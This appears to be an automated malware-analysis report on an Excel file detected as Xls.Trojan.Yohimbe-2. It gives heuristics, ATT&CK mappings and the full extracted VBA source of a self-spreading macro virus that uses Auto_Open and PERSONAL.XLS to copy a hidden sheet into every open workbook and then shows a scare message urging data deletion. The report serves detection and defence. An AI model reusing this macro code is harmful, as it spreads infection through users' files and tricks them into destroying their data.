MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The file is an Excel document containing a VBA macro, specifically an Auto_Open macro, which is a common technique for initial execution. The macro attempts to copy a sheet named 'Exec' into the user's PERSONAL.XLS workbook, indicating an attempt to establish persistence. The ClamAV detection as 'Xls.Trojan.Yohimbe-2' strongly suggests the Yohimbe malware family, which is known for its macro-based delivery and payload execution.
Heuristics (3)
- ClamAV: Xls.Trojan.Yohimbe-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Yohimbe-2
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2665 bytes |

SHA-256: 2d49c6d69c033f984eefba7022f51a59be4ec0920dbde67107d6154121afe9b0
Detection
- ClamAV: Xls.Trojan.Yohimbe-2
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "exec"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo FixIt
Dim SaveBook As String
SaveBook = ActiveWorkbook.Name
Application.ScreenUpdating = False
Windows("PERSONAL.XLS").Visible = True
If SheetExists("Exec") Then
Windows("PERSONAL.XLS").Visible = False
GoTo AlreadyInfected
Else
Workbooks(SaveBook).Activate
Sheets("Exec").Select
Sheets("Exec").Copy Before:=Workbooks("PERSONAL.XLS").Sheets(1)
Workbooks("PERSONAL.XLS").Activate
ActiveWindow.SelectedSheets.Visible = False
Workbooks("PERSONAL.XLS").Sheets(2).Select
ActiveWindow.Visible = False
Workbooks("PERSONAL.XLS").Save
AlreadyInfected:
Workbooks(SaveBook).Activate
If SheetExists("Exec") Then
End
End If
Workbooks("PERSONAL.XLS").Sheets("Exec").Copy Before:=Workbooks(SaveBook).Sheets(1)
Sheets("Exec").Select
ActiveWindow.SelectedSheets.Visible = False
Workbooks(SaveBook).Sheets(2).Select
End If
GoTo OhKay
FixIt:
Workbooks(SaveBook).Activate
End
OhKay:
Application.OnTime EarliestTime:=TimeValue("4:00 PM"), Procedure:="DipDing"
MsgBox "You have been infected with the Laurie Virus. Delete all data files and reinstall Excel.", , "Alert"
End Sub
Sub DipDing()
Attribute DipDing.VB_ProcData.VB_Invoke_Func = " \n14"
Application.ScreenUpdating = False
Dim book As Workbook
For Each book In Workbooks
Windows("PERSONAL.XLS").Visible = True
Windows("PERSONAL.XLS").Activate
Sheets("Exec").Visible = True
Sheets("Exec").Copy Before:=book.Sheets(1)
Sheets("Exec").Visible = xlVeryHidden
Windows("PERSONAL.XLS").Visible = False
book.Save
Next book
End Sub
Function SheetExists(sName As String) As Boolean
Attribute SheetExists.VB_ProcData.VB_Invoke_Func = " \n14"
Dim aSheet As Object
SheetExists = False
For Each aSheet In ActiveWorkbook.Sheets
If (StrComp(aSheet.Name, sName, 1) = 0) Then
SheetExists = True
End If
Next aSheet
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True